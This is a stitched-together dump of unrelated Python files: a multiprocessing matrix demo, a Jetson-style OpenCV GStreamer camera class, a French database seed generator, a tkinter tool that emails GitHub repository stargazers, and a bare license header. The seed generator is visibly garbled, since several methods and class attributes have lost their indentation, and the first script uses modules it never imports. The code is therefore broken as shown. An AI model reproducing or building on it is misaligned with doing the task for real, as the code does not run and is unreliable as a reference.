from math_func import func1, func2, func3, make_sq_matrix, make_vector
@contextmanager
def verbose(det):
    """Log entry and exit of task *det*, tagged with the current process id."""
    worker_pid = os.getpid()
    logging.info('Task %s in process %s started', det, worker_pid)
    yield
    logging.info('Task %s in process %s finished', det, worker_pid)
def task(det, size=4):
    """Run computation number *det* (1..3) on freshly generated inputs.

    det selects: 1 -> C := A - B * (MA * MD); 2 -> o := Min(MK * MM);
    3 -> T := (MS * MZ) * (W + X). Small results are printed.
    """
    assert 1 <= det <= 3
    assert size > 0
    with verbose(det):
        outcome = None
        # NOTE: the generator calls are kept in the original order so any
        # randomness in math_func produces the same sequence of values.
        if det == 1:
            mat_a = make_sq_matrix(size)
            mat_d = make_sq_matrix(size)
            vec_a = make_vector(size)
            vec_b = make_vector(size)
            outcome = func1(vec_a, vec_b, mat_a, mat_d)
        elif det == 2:
            mat_k = make_sq_matrix(size)
            mat_m = make_sq_matrix(size)
            outcome = func2(mat_k, mat_m)
        elif det == 3:
            vec_w = make_vector(size)
            vec_x = make_vector(size)
            mat_s = make_sq_matrix(size)
            mat_z = make_sq_matrix(size)
            outcome = func3(mat_s, mat_z, vec_w, vec_x)
        if size < 8:
            # Larger results would flood the console.
            print('task %s: %s' % (det, outcome))
def main(sz):
    """Launch the three tasks as separate processes and wait for them all."""
    assert sz > 0
    workers = [Process(target=task, args=(det, sz)) for det in range(1, 4)]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
if __name__ == '__main__':
    # Fix: setLevel() alone leaves the root logger without a handler, so the
    # INFO records from verbose() were silently dropped (the last-resort
    # handler only emits WARNING and above). basicConfig attaches a stderr
    # handler and sets the level in one call.
    logging.basicConfig(level=logging.DEBUG)
    sz = 1000
    main(sz)
|
opencv_gst_camera.py | import traitlets
import atexit
import cv2
import threading
import numpy as np
from .camera_base import CameraBase
class OpenCvGstCamera(CameraBase):
    """Camera that reads frames from an nvargus GStreamer pipeline via OpenCV.

    Frames are continuously captured on a background thread into ``value``;
    while recording is enabled each frame is also appended to a video file.
    """

    value = traitlets.Any()

    # config
    width = traitlets.Integer(default_value=816).tag(config=True)
    height = traitlets.Integer(default_value=616).tag(config=True)
    fps = traitlets.Integer(default_value=30).tag(config=True)
    capture_width = traitlets.Integer(default_value=816).tag(config=True)
    capture_height = traitlets.Integer(default_value=616).tag(config=True)

    # Number of frames written while recording / whether recording is active.
    record_step = 0
    record_flag = False

    def __init__(self, *args, **kwargs):
        self.value = np.empty((self.height, self.width, 3), dtype=np.uint8)
        # Fix: the original called super().__init__(self, *args, **kwargs),
        # passing `self` twice (once implicitly, once explicitly).
        super().__init__(*args, **kwargs)

        # NOTE(review): hard-coded output path; consider making configurable.
        path_video = "/home/kimbring2/Desktop/content_video.avi"
        self.video_out = cv2.VideoWriter(path_video, cv2.VideoWriter_fourcc(*'DIVX'), 30, (816, 616))

        try:
            self.cap = cv2.VideoCapture(self._gst_str(), cv2.CAP_GSTREAMER)
            re, image = self.cap.read()
            if not re:
                raise RuntimeError('Could not read image from camera.')
            self.value = image
            self.start()
        except Exception:
            # Fix: narrowed the bare `except:` so KeyboardInterrupt and
            # SystemExit are no longer swallowed.
            self.stop()
            raise RuntimeError(
                'Could not initialize camera. Please see error trace.')

        atexit.register(self.stop)

    def _capture_frames(self):
        """Background loop: read frames into self.value until capture fails."""
        while True:
            re, image = self.cap.read()
            if not re:
                break
            self.value = image
            if self.record_flag:
                self.video_out.write(image)
                self.record_step += 1

    def _gst_str(self):
        """Return the GStreamer pipeline string for the configured geometry."""
        return 'nvarguscamerasrc sensor-mode=3 ! video/x-raw(memory:NVMM), width=%d, height=%d, format=(string)NV12, framerate=(fraction)%d/1 ! nvvidconv ! video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! videoconvert ! appsink' % (
            self.capture_width, self.capture_height, self.fps, self.width, self.height)

    def record_start(self):
        """Start appending captured frames to the video file."""
        self.record_flag = True

    def record_stop(self):
        """Stop appending captured frames to the video file."""
        self.record_flag = False

    def start(self):
        """(Re)open the capture and launch the background frame thread."""
        if not self.cap.isOpened():
            self.cap.open(self._gst_str(), cv2.CAP_GSTREAMER)
        # Fix: Thread.isAlive() was removed in Python 3.9; use is_alive().
        if not hasattr(self, 'thread') or not self.thread.is_alive():
            self.thread = threading.Thread(target=self._capture_frames)
            self.thread.start()

    def stop(self):
        """Release the capture device and wait for the frame thread to exit."""
        if hasattr(self, 'cap'):
            self.cap.release()
        if hasattr(self, 'thread'):
            self.thread.join()

    def restart(self):
        """Stop and immediately restart frame capture."""
        self.stop()
        self.start()

    @staticmethod
    def instance(*args, **kwargs):
        """Factory helper returning a new OpenCvGstCamera."""
        return OpenCvGstCamera(*args, **kwargs)
|
database_seed.py | #!/usr/bin/python3.6
import threading
import multiprocessing
from functools import reduce
from time import sleep
from time import strftime
import mysql.connector
import json
from os.path import abspath, join, dirname
import random
import sys
import time
import itertools
import psycopg2
# Holds the most recent answer read from stdin by func().
user_input = None


def func():
    """Prompt on stdin and store the reply in the module-global user_input."""
    global user_input
    user_input = input(":\t")
class TaurSeedGenerator:
    def __init__(self, args):
        """Parse command-line *args*, load the configuration, then connect.

        self.main() returns -1 when the invocation only asked for help; in
        that case the program exits instead of opening a DB connection.
        """
        self._is_psql = True  # assume PostgreSQL until the config says otherwise
        if self.main(args) == -1:
            exit()
        self.init_database_connection()
__SGBD = ['mysql', 'psql'] # ['mysql', 'sqlite', 'postgres']
# initialisation du fichier de configuration
u_config = {
"dbms": "mysql",
"db": None,
"user": None,
"password": None,
"host": "127.0.0.1",
"port": 3306,
"ignore": [],
"len_row": 20,
"equal": {},
"choice": {},
"combine": {},
"border": {
"_def": [0, 10000000]
},
"unit": {
"_def": 1
}
}
# initialisation des variables local
_db_cursor = _db_connector = None
queue = _finalseed = []
    def appendExec(self, target=None, args=(), kwargs=None):
        """Start *target* in the first free slot of self.queue, retrying
        (recursively, every 2 s) until a slot frees up.

        NOTE(review): self.queue starts empty at class level; unless it is
        pre-populated elsewhere, the while loop body never runs and with an
        empty queue `idx == len(self.queue)` holds immediately, so this
        recurses forever — confirm the intended initialisation.
        """
        if kwargs is None:
            kwargs = {}
        if target:
            idx = 0
            while idx < len(self.queue):
                if (not self.queue[idx]) or (not self.queue[idx].is_alive()):
                    if self.queue[idx]:
                        self.queue[idx].terminate()  # reap the finished process
                    process = multiprocessing.Process(target=target, args=args, kwargs=kwargs)
                    self.queue[idx] = process
                    self.queue[idx].start()
                    break
                idx = idx + 1
            if idx == len(self.queue):
                # All slots busy: wait and retry.
                sleep(2)
                self.appendExec(target, args, kwargs)
def waitAllFinish(self):
alldone = 0
while alldone < len(self.queue):
sleep(5)
alldone = 0
for process in self.queue:
if (not process) or process.exitcode or (not process.is_alive()):
alldone = alldone + 1
@staticmethod
def full_path(filename):
return abspath(join(dirname(__file__), filename))
def files(self):
return {
'first:homme': self.full_path('homme.taur'),
'first:femme': self.full_path('femme.taur'),
'last': self.full_path('prenom.taur'),
'word': self.full_path('words.taur'),
}
    def get_name(self, val=0, typ=None):
        """Pick a random word or name from the bundled .taur data files.

        Parameters
        ----------
        val: int
            0 -> random word, 1 -> first name, 2 -> male name, 3 -> female
            name. May be overridden based on *typ*.
        typ: str, optional
            A column name; if it looks like a pseudo/nickname/first-name
            column, *val* is adjusted accordingly.
        """
        selected = filename = None
        if typ is not None:
            typ = typ.lower()
            if str(typ).__contains__('pseudo') \
                    or str(typ).__contains__('ickname') \
                    or str(typ).__contains__('prenom'):
                val = 1
            elif str(typ).__contains__('name') or str(typ).__contains__('nom'):
                val = random.randint(2, 3)
        if val == 0:  # look up a random word
            # selected = random.randint(0, 455000)
            selected = random.randint(0, 53)
            filename = self.files()['word']
        elif val == 1:  # look up a first name
            # selected = random.randint(0, 88000)
            selected = random.randint(0, 53)
            filename = self.files()['last']
        elif val == 2:  # look up a male name
            # selected = random.randint(0, 12000)
            selected = random.randint(0, 53)
            filename = self.files()['first:homme']
        elif val == 3:  # look up a female name
            # selected = random.randint(0, 42000)
            selected = random.randint(0, 53)
            filename = self.files()['first:femme']
        # NOTE(review): for any other val, filename stays None and open()
        # below raises TypeError — confirm callers only pass 0..3.
        with open(filename) as name_file:
            c = 0
            namer = ["", ""]
            for line in name_file:
                c = c + 1
                namer.append(line.strip().split()[0])
                if c > selected:
                    if val == 0:
                        # Words: return a multi-word phrase unless the column
                        # looks like a title.
                        if (c > 5) and not str(typ).__contains__('titre') and not str(typ).__contains__('title'):
                            return reduce(lambda x, y: str(x) + " " + str(y), namer[-7:])
                        return reduce(lambda x, y: str(x) + " " + str(y), namer[-2:])
                    else:
                        return namer[-1]
        return "taur string"  # fallback when the file has too few lines
    @staticmethod
    def get_doc():
        """Return the CLI help text (in French): flags and an example config."""
        res = "*" * 10 + "Taur seed generator" + "*" * 10
        res = res + "\n sgbd\tpour specifier le gestionaire de base de donnee. NB: si ommit 'mysql' sera utiliser"
        res = res + "\n -u\t\tpour specifier le nom de l'utilisateur de la base de donnee. ce parametre est requis"
        res = \
            res + "\n -h\t\tpour specifier l'address hote de la base de donnee. NB:si ommit 'localhost' sera utiliser"
        res = res + "\n -p\t\tpour specifier le mot de passe de l'utilisateur de la base de donnee."
        res = res + "\n -db\tpour specifier la base de donnee a utiliser. ce parametre est requis"
        res = res + "\n -l\t\tpour specifier la limite de donnee a inserer. sit omit la limit sera de 20"
        res = res + "\n -i\t\tpour specifier la liste des tables a ignore pendant l'insertion."
        res = res + "\n\t\tsi ce parametre est ommit, toute les tables soront modifier."
        res = res + "\n\t\tNB: on souhaite souvant ignorer les tables detier pour les frameworks"
        res = res + "\n\nexample:\n\tpython3 t_g_seed.py ? "
        res = res + "\n\tpython3 t_g_seed.py -conf ~/config.json"
        res = res + "\n\tpython3 t_g_seed.py -o -conf ./config.json"
        res = \
            res + "\n\nexample configuration:" + \
            '\n{\
            \n\t"dbms": "mysql",\
            \n\t"db": test,\
            \n\t"user": test,\
            \n\t"password": test,\
            \n\t"host": "127.0.0.1",\
            \n\t"port": 3306,\
            \n\t"ignore": ["SequelizeMeta"],\
            \n\t"len_row": 50,\
            \n\t"equal": { \
            \n\t    "your_colone": 0\
            \n\t    "your_colone": "test"\
            \n\t},\
            \n\t"choice": { \
            \n\t    "your_colone": ["val1", "val2", "val3"]\
            \n\t    "your_colone": [1, 5, 3]\
            \n\t},\
            \n\t"combine": { \
            \n\t    "your_colone":{ \
            \n\t        "val":[1,2,3,5,5,6,7,8,9]\
            \n\t        "join":"-"\
            \n\t    }\
            \n\t    "your_colone":{ \
            \n\t        "val":[[1,2],[3],[5],[5,6,7],8,9]\
            \n\t        "join":[]\
            \n\t    }\
            \n\t},\
            \n\t"border": {\
            \n\t    "_def": [0, 10000000]\
            \n\t    "your_colone": [5000, 10000000]\
            \n\t},\
            \n\t"unit": {\
            \n\t    "_def": 1\
            \n\t    "your_colone": 500\
            \n\t}\
            \n} '
        res = res + "\n\nNB: tout autre parametre sera ignorer\n"
        return res + "*" * 39
    def main(self, args):
        """Dispatch on the command line: show help or load the configuration.

        Returns -1 when only help was requested (caller then exits), 0 on a
        failed -conf invocation, otherwise the result of loadConfig().
        """
        sleep(1)
        print(args)
        if args.__len__() <= 1:
            # No arguments: fall back to the default configuration.
            return self.loadConfig()
        if args.__contains__('?'):
            print(self.get_doc())
            return -1
        if args.__contains__('-conf'):
            try:
                idx = args.index('-conf')
                if len(args) > idx + 1:
                    return self.loadConfig(args[idx + 1] or None)
                else:
                    print("Erreur: parametre de commande incorrecte")
            except Exception as e:
                print(e)
                print("Erreur: fichier de configuration incorrecte ou introuvavble")
        return 0
@staticmethod
def get_arg_value(idx, args):
arg = str(args[idx]).split('"')
if arg.__len__() == 3:
arg = arg[1]
else:
arg = arg[0].split("'")
if arg.__len__() == 3:
arg = arg[1]
else:
arg = arg[0]
return arg
def special_reduce(self, stri):
if type(self.u_config['combine'][stri]['join']) is str:
return lambda _x, y: str(_x) + self.u_config['combine'][stri]['join'] + str(y)
if type(self.u_config['combine'][stri]['join']) is list:
return lambda _x, y: (_x if type(_x) is list else [_x]) + self.u_config['combine'][stri]['join'] + (
y if type(y) is list else [y])
return lambda _x, y: _x + self.u_config['combine'][stri]['join'] + y
@staticmethod
def generate(val, ln):
if val == 0: # generer un nombre
return random.randint(0, 10 ** ln)
elif val == 1: # generer une date
return strftime('%Y-%m-%d %H:%M:%S')
elif val == 3: # generer une chaine de charactere
pass
    def get_config(self, strin, who=1):
        """Produce a value for column *strin* according to the u_config rules.

        Precedence: fixed 'equal' value, random 'choice', random 'combine'
        combination; then (for who == 0) a generated name; otherwise a random
        number scaled by the column's 'unit' within its 'border' range.
        """
        if self.u_config['equal'].__contains__(strin):
            return self.u_config['equal'][strin]
        if self.u_config['choice'].__contains__(strin):
            return random.choice(self.u_config['choice'][strin])
        if self.u_config['combine'].__contains__(strin):
            # Pick a random combination of at least two values and fold them
            # with the column's joiner.
            nb = random.randint(2, len(self.u_config['combine'][strin]['val']))
            a = list(itertools.combinations(self.u_config['combine'][strin]["val"], nb))
            return reduce(self.special_reduce(strin), random.choice(a))
        if who == 0:
            # Text column: generate a name/word instead of a number.
            return self.get_name(0, strin)
        if self.u_config['unit'].__contains__(strin):
            unit_key = self.u_config['unit'][strin]
        else:
            unit_key = self.u_config['unit']['_def']
        if self.u_config['border'].__contains__(strin):
            a = round(self.u_config['border'][strin][0] / unit_key)
            b = round(self.u_config['border'][strin][1] / unit_key)
            return unit_key * random.randint(a, b)
        else:
            a = round(self.u_config['border']['_def'][0] / unit_key)
            b = round(self.u_config['border']['_def'][1] / unit_key)
            return unit_key * random.randint(a, b)
    def addseed(self, tb, args, fin):
        """Generate u_config['len_row'] seed rows for table *tb* and append
        [table_name, rows, secondary_keys, primary_key] to *fin*.

        *args* describes the table's columns: per column a tuple whose fields
        used here are (name, type, ..., key_kind) with key_kind one of
        'PRI' / 'MUL' / 'UNI' / other.
        """
        finalseed = []
        idx = len(finalseed)
        finalseed.append([tb, [], [], None])
        print("add seed table", tb)
        for pos in range(self.u_config['len_row']):
            finalseed[idx][1].append({})
            for arg in args:
                if arg[3] == "PRI":
                    typ = arg[1][:3]
                    if finalseed[idx][3] is None:
                        finalseed[idx][3] = arg[0]  # record this primary key on the table
                    if pos == 0:
                        # First row: seed the primary key with a base value.
                        if typ == 'var':
                            finalseed[idx][1][pos][arg[0]] = self.get_name(0, arg[0])
                        elif typ == 'dat':
                            finalseed[idx][1][pos][arg[0]] = strftime('%Y-%m-%d %H:%M:%S')
                        else:
                            finalseed[idx][1][pos][arg[0]] = 1
                    else:
                        # Subsequent rows: increment the previous value to keep
                        # the key unique.
                        if typ == 'dat':
                            finalseed[idx][1][pos][arg[0]] = strftime('%Y-%m-%d %H:%M:%S')
                        else:
                            old = finalseed[idx][1][pos - 1][arg[0]]
                            finalseed[idx][1][pos][arg[0]] = old + str(1) if type(old) is str else old + 1
                elif arg[3] == "MUL":
                    # Secondary (foreign) key detected.
                    if not finalseed[idx][2].__contains__(arg[0]):
                        finalseed[idx][2].append(
                            arg[0])  # register this secondary key on the table if not already present
                    finalseed[idx][1][pos][arg[0]] = random.randint(1, self.u_config['len_row'])
                elif arg[3] == "UNI":
                    typ = arg[1][:3]
                    if pos == 0:
                        if typ == 'var':
                            finalseed[idx][1][pos][arg[0]] = self.get_config(arg[0], 0)
                        elif typ == 'dat':
                            finalseed[idx][1][pos][arg[0]] = strftime('%Y-%m-%d %H:%M:%S')
                        else:
                            finalseed[idx][1][pos][arg[0]] = 1
                    else:
                        if typ == 'dat':
                            finalseed[idx][1][pos][arg[0]] = strftime('%Y-%m-%d %H:%M:%S')
                        else:
                            old = finalseed[idx][1][pos - 1][arg[0]]
                            finalseed[idx][1][pos][arg[0]] = old + 1 if type(old) is int else old + str(1)
                else:
                    # Ordinary column: generate per type.
                    typ = arg[1][:3]
                    if typ == 'var':
                        finalseed[idx][1][pos][arg[0]] = self.get_config(arg[0], 0)
                    elif (typ == 'boo') | (typ == 'BOO'):
                        finalseed[idx][1][pos][arg[0]] = random.choice([True, False])
                    elif typ == 'dat':
                        finalseed[idx][1][pos][arg[0]] = strftime('%Y-%m-%d %H:%M:%S')
                    else:
                        finalseed[idx][1][pos][arg[0]] = self.get_config(arg[0])
        fin.append(finalseed[0])
def init_database_connection(self):
    """Connect to the configured DBMS, discover its tables, build seed rows
    for every table (via self.appendExec worker helpers), order the tables so
    foreign keys always reference already-seeded tables, then — after user
    confirmation — bulk-insert everything.

    Exits the process on connection failure, on an unresolvable foreign-key
    ordering, or when the user declines/times out at the confirmation prompt.
    """
    try:
        if self.u_config['dbms'] == 'mysql':
            self._db_connector = mysql.connector.connect(
                host=self.u_config['host'],
                port=self.u_config['port'],
                database=self.u_config['db'],
                user=self.u_config['user'],
                passwd=self.u_config['password']
            )
            # NOTE(review): _is_psql is only assigned here (mysql branch);
            # presumably it defaults to True elsewhere — confirm.
            self._is_psql = False
        else:
            self._db_connector = psycopg2.connect(
                host=self.u_config['host'],
                port=self.u_config['port'],
                database=self.u_config['db'],
                user=self.u_config['user'],
                password=self.u_config['password']
            )
    except Exception as e:
        # Connection failed: dump the parameters that were used, then abort.
        sleep(1)
        print(e)
        print("Erreur Taur n'arrive pas a se connecter avec les parametres fourni.")
        print("\t{\n\t\tsgbd :\t\t'" + str(self.u_config['dbms']) + "'\n\t\t", end=' ')
        print("user :\t\t'" + str(self.u_config['user']) + "'\n\t\t", end=' ')
        print("password :\t'" + str(self.u_config['password']) + "'\n\t\t", end=' ')
        print("host :\t\t'" + str(self.u_config['host']) + "'\n\t\t", end=' ')
        print("database :\t'" + str(self.u_config['db']) + "'\n\t}\n\n", end=' ')
        exit()
    print("connection au sgbd '" + str(self.u_config['dbms']) + "' reussi")
    self._db_cursor = self._db_connector.cursor()
    print('*' * 8 ** 3, end='\n\n')
    # List user tables (psql: skip system schemas; mysql: SHOW TABLES).
    if self._is_psql:
        self._db_cursor.execute("SELECT \
            table_schema || '.' || table_name \
            FROM \
            information_schema.tables \
            WHERE \
            table_type = 'BASE TABLE' \
            AND \
            table_schema NOT IN ('pg_catalog', 'information_schema');")
    else:
        self._db_cursor.execute("SHOW TABLES")
    table_list = []
    for x in self._db_cursor:
        print(x[0], end=', ')
        table_list.append(x[0])
    self._db_cursor.close()
    print("\nList des tables trouver:\n\t", end=' ')
    print(table_list)
    # Remove the tables the user asked to ignore (single name or list).
    if type(self.u_config['ignore']) is str:
        if table_list.__contains__(self.u_config['ignore']):
            table_list.remove(self.u_config['ignore'])
    elif type(self.u_config['ignore']) is list:
        for ignore in self.u_config['ignore']:
            if table_list.__contains__(ignore):
                table_list.remove(ignore)
    sleep(2)
    self._db_cursor = self._db_connector.cursor()
    _finaltable = []
    # _finaltable holds (table_name, [column descriptions]) pairs, see below.
    ''' table final contient le nom de la table, la liste de colon
    il sera representer comme suit:
    [('table0',[('colonne1','type','isMul') # mul est mis ici pour les cles secondaires])]
    '''
    print("\n\nListe final des tables a modifier", table_list)
    print("preparation de l'insertion")
    # Seed rows are produced by workers into a manager-backed shared list.
    manager = multiprocessing.Manager()
    finalseed = manager.list()
    for table in table_list:
        assert isinstance(table, str)
        # self._db_cursor.execute("SHOW CREATE TABLE " + el)
        if self._is_psql:
            self._db_cursor.execute("SELECT * \
                FROM information_schema.columns \
                WHERE table_schema = " + table)
        else:
            self._db_cursor.execute("SHOW COLUMNS FROM " + table)
        _finaltable.append((table, []))
        flen = len(_finaltable)
        for nxt in self._db_cursor:
            _finaltable[flen - 1][1].append(list(nxt))
        self.appendExec(self.addseed, (table, _finaltable[flen - 1][1], finalseed))
    self.waitAllFinish()
    self._finalseed = finalseed
    print()
    print("seed a inserer")
    print(self._finalseed)
    print('verification de cle secondaire')
    # Reorder self._finalseed so that every table comes after the tables its
    # foreign keys reference; `count` caps the number of restarts so a cyclic
    # dependency cannot loop forever.
    remplacement = True
    idx = 0
    count = 0  # guards against endless re-ordering (recursive indexing)
    fln = len(self._finalseed)
    fln2 = fln ** 3
    precedent_primarys_key = []
    while (remplacement | (idx < fln)) & (count < fln2):
        remplacement = False
        precedent_primarys_key.append((self._finalseed[idx][0], self._finalseed[idx][3]))
        ln = len(self._finalseed[idx][2])
        if ln != 0:
            for foreign_id in range(ln):
                if not self.string_contain_tuple_in_array(self._finalseed[idx][2][foreign_id],
                                                          precedent_primarys_key):
                    # Unresolved reference: push this table to the end.
                    _el = self._finalseed[idx]
                    self._finalseed.remove(_el)
                    self._finalseed.append(_el)
                    remplacement = True
                    break
        idx = idx + 1
        if remplacement:
            # Restart the scan from the beginning after any move.
            print("# on reinitialise les compteur: table: " + str(self._finalseed[fln - 1][0]))
            print(list(map(lambda _x: _x[0], self._finalseed)))
            count = count + 1
            precedent_primarys_key = []
            idx = 0
    if count >= fln2:
        print("\n\n**********************\n\tErreur: indexsation recurssive")
        print("\tverifier les cles secondaire\n*******************\n")
        exit()
    print("\n\ncommencer l'insertion?\n")
    print("vous avez 30 secondes pour repondre y ou o pour oui et tout autres lettre pour nom")
    res = self.get_input(30)
    if (res == 'y') | (res == 'Y') | (res == 'O') | (res == 'o'):
        # Insert every table's rows with a single executemany per table.
        for table in self._finalseed:
            into = reduce(lambda _x, _y: str(_x) + ", " + str(_y), table[1][0].keys())
            valu = list(map(lambda _s: tuple(_s.values()), table[1]))
            print(into)
            print(valu)
            # Build "INSERT INTO t (c1, c2) VALUES (%s,%s)" — one %s per column.
            sql = "INSERT INTO " + str(table[0]) + " (" + into + ") VALUES (" + reduce(
                lambda _x, y: _x + "%s,", into.split(', '), "")[:-1] + ")"
            self._db_cursor.executemany(sql, valu)
            self._db_connector.commit()
    else:
        if res is None:
            print("delai depasser")
        print('\n' * 2, "bye!", end='\n')
        exit()
@staticmethod
def get_input(timeout=10):
    """Prompt the user (via the module-level `func` worker) and wait at most
    `timeout` seconds for an answer.

    Returns the text the user typed, or None if the timeout elapsed.
    NOTE(review): relies on the module-level `func` thread target and the
    global `user_input` it fills in — both defined elsewhere in this file.
    """
    global user_input
    user_input = None
    # Read input on a daemon thread so an unanswered prompt cannot keep the
    # interpreter alive. join(timeout) replaces the old 1-second polling loop
    # and the call to the private Thread._delete(), which no longer exists on
    # modern Python and raised AttributeError after every prompt.
    th = threading.Thread(target=func)
    th.daemon = True
    th.start()
    th.join(timeout)
    return user_input
@staticmethod
def string_contain_tuple_in_array(string, arr_tuple):
    """Return True if `string` looks like a foreign-key column built from one
    of the (table_name, primary_key) tuples in `arr_tuple`.

    A match means: `string` starts with the singular table name, ends with
    the primary-key name, and has at most one extra joining character —
    e.g. "user_id" matches ("users", "id").
    """
    string = string.lower()
    for tupl in arr_tuple:
        # Singularise the table name only when it actually ends with 's'.
        # (The previous code stripped the last character unconditionally, so
        # non-plural table names such as "user" became "use" and their
        # foreign keys were never recognised.)
        _table_name = tupl[0].lower()
        if _table_name.endswith('s'):
            _table_name = _table_name[:-1]
        _primary_key = tupl[1].lower()
        lns = len(string)
        lnt = len(_table_name)
        lnp = len(_primary_key)
        if string.__contains__(_table_name) and string.__contains__(_primary_key) and (
                lnp + lnt <= lns < lnp + lnt + 2) and (string.index(_table_name) == 0) and (
                string.index(_primary_key) == lns - lnp):
            return True
    return False
def loadConfig(self, file_path='./config.seed.json'):
    """Load the JSON seed configuration into self.u_config.

    Returns 0 on success, -1 on any error (the error is printed).
    Required keys: 'user' and 'db'; everything else has a default. Also sizes
    self.queue with one slot per worker process ('process_number', default 2).
    """
    try:
        if file_path[-5:] != '.json':
            raise Exception('veuillez le fichier de configuration doit etre un fichier extenstion json')
        # Use a context manager so the config file handle is always closed
        # (the previous code opened it and never closed it).
        with open(str(file_path)) as json_file:
            _config = json.load(json_file)
        if _config.__contains__('dbms'):
            self.u_config['dbms'] = _config['dbms']
        if _config.__contains__('user'):
            self.u_config['user'] = _config['user']
        else:
            raise Exception('utilisateur nom defini')
        if _config.__contains__('password'):
            self.u_config['password'] = _config['password']
        # One queue slot per worker process (default: 2 workers).
        if _config.__contains__('process_number'):
            for proc in range(_config['process_number']):
                self.queue.append(None)
        else:
            for proc in range(2):
                self.queue.append(None)
        if _config.__contains__('host'):
            self.u_config['host'] = _config['host']
        if _config.__contains__('port'):
            self.u_config['port'] = _config['port']
        elif self.u_config['dbms'] == 'psql':
            # PostgreSQL default port when none is configured.
            self.u_config['port'] = 5432
        if _config.__contains__('db'):
            self.u_config['db'] = _config['db']
        else:
            raise Exception('la base de donnee n\'est pas specifier')
        if _config.__contains__('len_row'):
            self.u_config['len_row'] = _config['len_row']
        else:
            print('le nombre de colonne n\'a pas ete specifier, 50 sera utiliser par default')
        if _config.__contains__('ignore'):
            self.u_config['ignore'] = _config['ignore']
        if _config.__contains__('equal'):
            self.u_config['equal'] = _config['equal']
        if _config.__contains__('choice'):
            self.u_config['choice'] = _config['choice']
        if _config.__contains__('combine'):
            # Only accept combine entries whose 'val' is a list; default the
            # join separator to a single space.
            for key in _config['combine']:
                if _config['combine'][key].__contains__('val') and (type(_config['combine'][key]['val']) is list):
                    self.u_config['combine'][key] = _config['combine'][key]
                    if not _config['combine'][key].__contains__('join'):
                        self.u_config['combine'][key]['join'] = " "
        if _config.__contains__('border'):
            self.u_config['border'] = _config['border']
            if not _config['border'].__contains__('_def'):
                # NOTE(review): this mirrors the 'unit' block below but writes
                # to u_config['unit'], not u_config['border'] — looks like a
                # copy-paste slip; yet get_border() indexes border['_def'][0],
                # so a scalar default would be the wrong shape anyway.
                # Kept as-is; confirm the intended default for border['_def'].
                self.u_config['unit']['_def'] = 1
        if _config.__contains__('unit'):
            self.u_config['unit'] = _config['unit']
            if not _config['unit'].__contains__('_def'):
                self.u_config['unit']['_def'] = 1
        return 0
    except Exception as e:
        print(e)
        return -1
# Script entry point: build and run the seed generator with the CLI arguments.
if __name__ == "__main__":
    TaurSeedGenerator(sys.argv)
|
gui.py | import tkinter as tk
import gmail
import settings
import threading
from datetime import datetime
from github_interface import GithubInterface
def change_button_states(active):
    """Enable (active=True) or disable (active=False) both action buttons."""
    new_state = 'normal' if active else 'disabled'
    for button in (refresh_button, send_button):
        button.config(state=new_state)
def log_message(text):
    """Append a timestamped line to the log box and scroll it into view."""
    stamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
    # The Text widget is kept disabled so users cannot type into it; enable
    # it just long enough to insert the new line.
    message.configure(state='normal')
    message.insert(tk.END, f"{stamp} {text}\n")
    message.configure(state='disabled')
    message.see(tk.END)
def async_github_fetch():
    """Worker: refresh the repository list and fill the listbox, then
    re-enable the buttons (runs on a background thread)."""
    github.fetch_updated_repos()
    for repo in github.repos:
        listbox.insert('end', f"{repo.name} ({len(repo.gazers)} new gazers)")
    log_message("Done fetching repositories!")
    change_button_states(True)
def refresh_repos():
    """Clear the listbox and fetch repositories on a background thread."""
    change_button_states(False)
    log_message("Fetching repos...")
    listbox.delete(0, 'end')
    worker = threading.Thread(target=async_github_fetch)
    worker.start()
def async_send_email():
    """Worker: e-mail every gazer of each selected repository, persist the
    sent-state, then refresh the list (runs on a background thread).

    NOTE(review): reads listbox.curselection() from a worker thread; tkinter
    is not thread-safe — confirm this is acceptable here.
    """
    selected = listbox.curselection()
    for index, repo in enumerate(github.repos):
        if index not in selected:
            continue
        log_message(f"Repository: {repo.name}")
        for name, email in repo.gazers:
            log_message(f"Sending to \'{name}\' ({email})")
            email_text = settings.email_text.format(settings.gmail_user,
                                                    email,
                                                    repo.name,
                                                    name,
                                                    repo.name,
                                                    repo.url)
            gmail.send_mail(email, email_text)
            # Remember who was contacted so they are not e-mailed twice.
            github.mark_as_sent(repo.url, email)
    log_message("Saving sent emails...")
    github.save_data()
    log_message("Done sending emails!")
    refresh_repos()
def send_emails():
    """Disable the buttons and start sending e-mails on a background thread."""
    change_button_states(False)
    worker = threading.Thread(target=async_send_email)
    worker.start()
# --- Application wiring: state, main window, widgets and layout. ---
github = GithubInterface()
master = tk.Tk()
master.title("GithubSurvey")
title_label = tk.Label(master, text="Github Repositories:")
refresh_button = tk.Button(master, text="Refresh", command=refresh_repos)
# Vertical paned window: repository list on top, debug log below.
pw = tk.PanedWindow(master, orient=tk.VERTICAL)
# listbox + scrollbar
listbox_frame = tk.Frame(pw)
listbox_scrollbar = tk.Scrollbar(listbox_frame)
listbox = tk.Listbox(listbox_frame, yscrollcommand=listbox_scrollbar.set, selectmode=tk.EXTENDED)
listbox_scrollbar.config(command=listbox.yview)
listbox.pack(expand=tk.Y, side=tk.LEFT, fill=tk.BOTH)
listbox_scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
pw.add(listbox_frame)
# debug message box
message_frame = tk.Frame(pw)
message_scrollbar = tk.Scrollbar(message_frame)
# Created disabled: log_message() toggles it writable only while inserting.
message = tk.Text(message_frame, height=8, wrap=None, state='disabled')
message_scrollbar.config(command=message.yview)
message.pack(expand=tk.Y, side=tk.LEFT, fill=tk.BOTH)
message_scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
pw.add(message_frame)
send_button = tk.Button(master, text="Send!", command=send_emails)
# pack everything
title_label.pack()
refresh_button.pack()
pw.pack(side=tk.TOP, expand=tk.Y, fill=tk.BOTH, pady=2, padx='2m')
send_button.pack()
# Schedule the first repository fetch as soon as the event loop starts.
title_label.after(0, refresh_repos)
master.mainloop()
|
test_utils.py | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
